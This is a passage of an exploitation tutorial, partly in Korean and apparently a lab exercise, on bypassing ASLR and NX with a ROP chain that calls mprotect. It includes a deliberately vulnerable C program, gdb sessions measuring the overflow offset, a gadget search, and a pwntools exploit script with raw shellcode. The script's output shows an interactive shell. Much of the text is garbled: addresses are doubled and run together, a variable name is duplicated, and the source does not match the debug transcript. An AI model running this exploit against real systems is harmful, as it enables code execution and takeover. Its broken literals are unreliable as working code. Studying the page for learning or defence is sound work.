...
| Code Block | ||||
|---|---|---|---|---|
| ||||
//gcc -fno-stack-protector -o roprop64 roprop64.c -ldl
// Deliberately vulnerable target for the ROP + mprotect exercise on this page.
// It is built without a stack protector (flag above), so nothing detects the
// overwrite of the saved return address that the exercise relies on.
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

/*
 * Leak a libc function address, then read more input than buf can hold.
 *
 * - dlsym(RTLD_NEXT, "printf") resolves printf in the next object in lookup
 *   order after this one, and the %p print hands that address to whoever
 *   supplies the input. The tutorial treats it as libc's printf: one leaked
 *   libc address plus a known libc build is enough to recover the libc load
 *   base, so ASLR stops protecting the process. Defensive takeaway: never
 *   print code addresses.
 * - read() accepts up to 256 bytes into a 50-byte buffer, a classic stack
 *   overflow. Per the gdb session on this page, buf starts 72 bytes below the
 *   saved return address.
 *
 * NOTE(review): the gdb transcript on this page also prints a
 * "buf[50] address : " line that this listing does not contain; the binary that
 * was debugged presumably came from a slightly different revision of the source.
 */
void vuln(){
    char buf[50];
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 256);   /* overflow: 256 > sizeof buf; return value is not checked */
}

/* Entry point: write a banner to stdout, then run the vulnerable routine.
 * NOTE: the standard-conforming signature is int main(void). */
void main(){
    write(1,"Hello ROP\n",10);
    vuln();
}
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ gdb -q ./roprop64 Reading symbols from ./roprop64...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x00000000004006c6 <+0>: push rbp 0x00000000004006c7 <+1>: mov rbp,rsp 0x00000000004006ca <+4>: sub rsp,0x40 0x00000000004006ce <+8>: mov esi,0x4007d40x4007c4 0x00000000004006d3 <+13>: mov rdi,0xffffffffffffffff 0x00000000004006da <+20>: call 0x4005b0 <dlsym@plt> 0x00000000004006df <+25>: mov QWORD PTR [rbp-0x8],rax 0x00000000004006e3 <+29>: mov rax,QWORD PTR [rbp-0x8] 0x00000000004006e7 <+33>: mov rsi,rax 0x00000000004006ea <+36>: mov edi,0x4007db 0x00000000004006ef <+41>: mov eax,0x0 0x00000000004006f4 <+46>: call 0x400580 <printf@plt> 0x00000000004006f9 <+51>: lea rax,QWORD PTR [rbp-0x400x8] 0x00000000004006fd0x00000000004006e7 <+55>33>: mov rsi,rax 0x00000000004007000x00000000004006ea <+58>36>: mov edi,0x4007f20x4007cb 0x00000000004007050x00000000004006ef <+63>41>: mov eax,0x0 0x000000000040070a0x00000000004006f4 <+68>46>: call 0x400580 <printf@plt> 0x000000000040070f0x00000000004006f9 <+73>51>: lea rax,[rbp-0x40] 0x00000000004007130x00000000004006fd <+77>55>: mov edx,0x100 0x00000000004007180x0000000000400702 <+82>60>: mov rsi,rax 0x000000000040071b0x0000000000400705 <+85>63>: mov edi,0x0 0x00000000004007200x000000000040070a <+90>68>: call 0x400590 <read@plt> 0x00000000004007250x000000000040070f <+95>73>: nop 0x00000000004007260x0000000000400710 <+96>74>: leave 0x00000000004007270x0000000000400711 <+97>75>: ret End of assembler dump. gdb-peda$ b *0x00000000004006c6 Breakpoint 1 at 0x4006c6 gdb-peda$ b *0x00000000004007200x000000000040070a Breakpoint 2 at 0x4007200x40070a gdb-peda$ |
- 다음과 같이 Overflow를 확인할 수 있습니다.
Return address(0x7fffffffe488) - buf 변수의 시작 주소 (0x7fffffffe440) = 72
- 즉, 72개 이상의 문자를 입력함으로써 Return address 영역을 덮어 쓸 수 있습니다.
| Code Block | ||
|---|---|---|
| ||
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/ROPStager/mprotect/rop rop64 Hello ROP Breakpoint 1, 0x00000000004006c6 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe488 0x7fffffffe488 gdb-peda$ c Continuing. Printf() address : 0x7ffff785e800 buf[50] address : 0x7fffffffe440 Breakpoint 2, 0x00000000004007200x000000000040070a in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe440 0x7fffffffe440 gdb-peda$ p/d 0x7fffffffe488 - 0x7fffffffe440 $1 = 72 gdb-peda$ |
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ ./rp-lin-x64 -f ./roprop64 -r 1| grep "pop rdi" 0x004007b30x004007a3: pop rdi ; ret ; (1 found) lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ |
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
from struct import *  # NOTE: struct's pack/unpack are not used below; pwntools' p64 does the packing
#context.log_level = 'debug'
# Exploit script for the roprop64 target listed above. It appears to be
# Python 2 pwntools (str payloads concatenated with p64 output; run as
# `python rop.py` in the transcript below).
#
# What the script depends on, and what would stop it:
#   - the target prints printf's address, which gives away the libc load base
#     (ASLR is no obstacle once one libc address is known)
#       -> do not print code addresses;
#   - the target is compiled with -fno-stack-protector, so the 72-byte overflow
#     into the saved return address goes unnoticed
#       -> a stack canary would abort the process here;
#   - the chain calls mprotect() to make the stack page executable before
#     returning into the bytes it wrote there, so NX on its own is bypassed
#       -> a policy that refuses to turn writable memory executable blocks this step.
#
# Raw machine code placed at the start of the input; the interactive shell at the
# end of the transcript below is the result of it running.
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# Symbol offsets are read from this specific libc build; they differ for every
# other libc build, so the script is tied to this one file.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
libcbase_printf_offset = libc.symbols['printf']
libcbase_mprotect_offset = libc.symbols['mprotect']
# Address of the "pop rdi ; ret" gadget found with rp++ above.
# NOTE(review): as rendered on this page the literal is two hex values run
# together (the rp++ output above shows the same) and does not parse as Python.
pop_rdi_ret = 0x004007b30x004007a3
# Offset of the second gadget inside libc.
# NOTE(review): the variable name is doubled as rendered; the
# `p64(libcbase + pop_rdx_ret_offset)` line below reads a name that is never
# assigned in this listing.
pop_rdx_ret_offsetpop_rdx_ret_offset = 0x1150c9
r = process('./roprop64')
r.recvn(10)                                  # the "Hello ROP\n" banner (10 bytes, see write() in the C source)
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)         # leaked printf address
libcbase -= libcbase_printf_offset           # leaked address - symbol offset = libc load base
# NOTE(review): the C listing above has no "buf[50] address" printf, but the gdb
# transcript does; the binary presumably came from a later source revision.
r.recvuntil('buf[50] address : ')
stack = int(r.recvuntil('\n'),16)            # address of buf, i.e. where the input lands on the stack
# Round buf's address down to a 0x1000 boundary by string slicing:
# "0x" + 9 hex digits, then "000". This assumes the address prints as exactly
# 12 hex digits (true in the transcript below: 0x7ffd0e0a4470 -> 0x7ffd0e0a4000).
back = str(hex(stack))
shellArea = int(back[0:11] + '000',16)
log.info(back[0:11])
log.info(hex(shellArea))
log.info("libcbase : " + hex(libcbase))
log.info("stack : " + hex(stack))
log.info("mprotect() : " + hex(libcbase + libcbase_mprotect_offset))
# Input layout: machine code first, "A" filler up to the 72 bytes that separate
# buf from the saved return address (measured in the gdb session above), then
# the return-oriented chain that overwrites the return address onwards.
payload = shellcode
payload += "A" * (72 - len(shellcode))
#mprotect(address of shellcode,0x2000,0x7)
payload += p64(pop_rdi_ret)                  # first argument: the page containing buf
payload += p64(shellArea)
payload += p64(libcbase + pop_rdx_ret_offset)   # NOTE(review): two values follow this gadget, so it must pop two registers; the name suggests only rdx -- confirm against the gadget at this offset
payload += p64(0x7)                          # protection 0x7 and length 0x2000, per the comment above
payload += p64(0x2000)
payload += p64(libcbase + libcbase_mprotect_offset)  # call mprotect() in libc
payload += p64(stack)                        # mprotect() returns into buf, where the machine code was written
r.send(payload)
r.interactive()
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ python rop.py
[*] '/lib/x86_64-linux-gnu/libc-2.23.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './roprop64': pid 43561
[*] 0x7ffd0e0a4
[*] 0x7ffd0e0a4000
[*] libcbase : 0x7fe88a73e000
[*] stack : 0x7ffd0e0a4470
[*] mprotect() : 0x7fe88a83f770
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ |
...